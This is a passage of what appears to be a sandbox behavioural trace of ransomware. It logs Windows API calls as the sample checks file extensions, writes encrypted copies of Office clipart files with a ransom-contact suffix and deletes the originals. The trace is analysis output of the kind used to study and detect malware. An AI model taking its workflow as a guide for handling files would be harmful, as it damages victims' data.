lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 68 [0063.542] lstrlenW (lpString=".jpg") returned 4 [0063.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.543] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.543] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.543] GetLastError () returned 0x0 [0063.543] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x370, lpOverlapped=0x0) returned 1 [0063.559] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x380, lpOverlapped=0x0) returned 1 [0063.560] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.560] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.560] SetEndOfFile (hFile=0x354) returned 1 [0063.560] CloseHandle (hObject=0x354) returned 1 [0063.561] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.561] SetEndOfFile (hFile=0x2c8) returned 1 [0063.562] CloseHandle (hObject=0x2c8) returned 1 [0063.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.563] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf")) returned 1 [0063.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0063.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0063.565] lstrlenW (lpString=".doc") returned 4 [0063.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.565] lstrlenW (lpString=".docx") returned 5 [0063.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.565] lstrlenW (lpString=".pdf") returned 4 [0063.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.565] lstrlenW (lpString=".xls") returned 4 [0063.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.565] lstrlenW (lpString=".xlsx") returned 5 [0063.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.565] lstrlenW (lpString=".ppt") returned 4 [0063.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0063.565] lstrlenW (lpString=".zip") returned 4 [0063.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.565] lstrlenW (lpString=".rar") returned 4 [0063.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.565] lstrlenW (lpString=".bz2") returned 4 [0063.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.565] lstrlenW (lpString=".7z") returned 3 [0063.566] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0063.566] lstrlenW (lpString=".dbf") returned 4 [0063.566] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0063.566] lstrlenW (lpString=".1cd") returned 4 [0063.566] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0063.566] lstrlenW (lpString=".jpg") returned 4 [0063.566] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.572] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.572] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0063.574] GetLastError () returned 0x0 [0063.574] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x6a0, lpOverlapped=0x0) returned 1 [0063.596] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x6b0, lpOverlapped=0x0) returned 1 [0063.597] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.597] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.597] SetEndOfFile (hFile=0x354) returned 1 [0063.600] CloseHandle (hObject=0x354) returned 1 [0063.601] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.601] SetEndOfFile (hFile=0x368) returned 1 [0063.603] CloseHandle (hObject=0x368) returned 1 [0063.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf")) returned 1 [0063.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0063.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0063.605] lstrlenW (lpString=".doc") returned 4 [0063.605] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString=".docx") returned 5 [0063.605] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.605] lstrlenW (lpString=".pdf") returned 4 [0063.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString=".xls") returned 4 [0063.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.605] lstrlenW (lpString=".xlsx") returned 5 [0063.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.605] lstrlenW (lpString=".ppt") returned 4 [0063.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0063.605] lstrlenW (lpString=".zip") returned 4 [0063.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.605] lstrlenW (lpString=".rar") returned 4 [0063.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString=".bz2") returned 4 [0063.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString=".7z") returned 3 [0063.605] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0063.605] lstrlenW (lpString=".dbf") returned 4 [0063.605] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0063.605] lstrlenW (lpString=".1cd") returned 4 [0063.605] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0063.605] lstrlenW (lpString=".jpg") returned 4 [0063.605] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.606] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.606] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.606] GetLastError () returned 0x0 [0063.606] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xfb8, lpOverlapped=0x0) returned 1 [0063.622] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xfc0, lpOverlapped=0x0) returned 1 [0063.623] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.623] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.623] SetEndOfFile (hFile=0x358) returned 1 [0063.623] CloseHandle (hObject=0x358) returned 1 [0063.624] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.624] SetEndOfFile (hFile=0x350) returned 1 [0063.625] CloseHandle (hObject=0x350) returned 1 [0063.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf")) returned 1 [0063.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0063.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0063.625] lstrlenW (lpString=".doc") returned 4 [0063.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.625] lstrlenW (lpString=".docx") returned 5 [0063.626] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.626] lstrlenW (lpString=".pdf") returned 4 [0063.626] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.626] lstrlenW (lpString=".xls") returned 4 [0063.626] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.626] lstrlenW (lpString=".xlsx") returned 5 [0063.626] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.626] lstrlenW (lpString=".ppt") returned 4 [0063.626] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0063.626] lstrlenW (lpString=".zip") returned 4 [0063.626] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.626] lstrlenW (lpString=".rar") returned 4 [0063.626] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.626] lstrlenW (lpString=".bz2") returned 4 [0063.626] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.626] lstrlenW (lpString=".7z") returned 3 [0063.626] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0063.626] lstrlenW (lpString=".dbf") returned 4 [0063.626] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0063.626] lstrlenW (lpString=".1cd") returned 4 [0063.626] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0063.626] lstrlenW (lpString=".jpg") returned 4 [0063.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.626] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.627] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.627] GetLastError () returned 0x0 [0063.627] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1264, lpOverlapped=0x0) returned 1 [0063.628] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1270, lpOverlapped=0x0) returned 1 [0063.629] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.629] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.629] SetEndOfFile (hFile=0x358) returned 1 [0063.629] CloseHandle (hObject=0x358) returned 1 [0063.630] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.630] SetEndOfFile (hFile=0x350) returned 1 [0063.631] CloseHandle (hObject=0x350) returned 1 [0063.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.631] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00252_.wmf")) returned 1 [0063.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0063.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0063.632] lstrlenW (lpString=".doc") returned 4 [0063.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString=".docx") returned 5 [0063.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.632] lstrlenW (lpString=".pdf") returned 4 [0063.632] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString=".xls") returned 4 [0063.632] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.632] lstrlenW (lpString=".xlsx") returned 5 [0063.632] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.632] lstrlenW (lpString=".ppt") returned 4 [0063.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0063.632] lstrlenW (lpString=".zip") returned 4 [0063.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.632] lstrlenW (lpString=".rar") returned 4 [0063.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString=".bz2") returned 4 [0063.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString=".7z") returned 3 [0063.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0063.632] lstrlenW (lpString=".dbf") returned 4 [0063.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0063.632] lstrlenW (lpString=".1cd") returned 4 [0063.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 68 [0063.632] lstrlenW (lpString=".jpg") returned 4 [0063.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.642] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.642] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.643] GetLastError () returned 0x0 [0063.643] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x6c8, lpOverlapped=0x0) returned 1 [0063.661] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x6d0, lpOverlapped=0x0) returned 1 [0063.662] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.662] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.662] SetEndOfFile (hFile=0x358) returned 1 [0063.662] CloseHandle (hObject=0x358) returned 1 [0063.663] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.663] SetEndOfFile (hFile=0x350) returned 1 [0063.663] CloseHandle (hObject=0x350) returned 1 [0063.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.664] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00254_.wmf")) returned 1 [0063.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0063.665] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0063.665] lstrlenW (lpString=".doc") returned 4 [0063.665] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.665] lstrlenW (lpString=".docx") returned 5 [0063.665] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.665] lstrlenW (lpString=".pdf") returned 4 [0063.666] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.666] lstrlenW (lpString=".xls") returned 4 [0063.666] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.666] lstrlenW (lpString=".xlsx") returned 5 [0063.666] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.666] lstrlenW (lpString=".ppt") returned 4 [0063.666] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0063.666] lstrlenW (lpString=".zip") returned 4 [0063.666] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.666] lstrlenW (lpString=".rar") returned 4 [0063.666] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.666] lstrlenW (lpString=".bz2") returned 4 [0063.666] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.666] lstrlenW (lpString=".7z") returned 3 [0063.666] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0063.666] lstrlenW (lpString=".dbf") returned 4 [0063.666] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0063.666] lstrlenW (lpString=".1cd") returned 4 [0063.666] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00254_.WMF") returned 68 [0063.666] lstrlenW (lpString=".jpg") returned 4 [0063.666] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.667] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.667] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.668] GetLastError () returned 0x0 [0063.668] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xa54, lpOverlapped=0x0) returned 1 [0063.765] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xa60, lpOverlapped=0x0) returned 1 [0063.766] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.766] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.766] SetEndOfFile 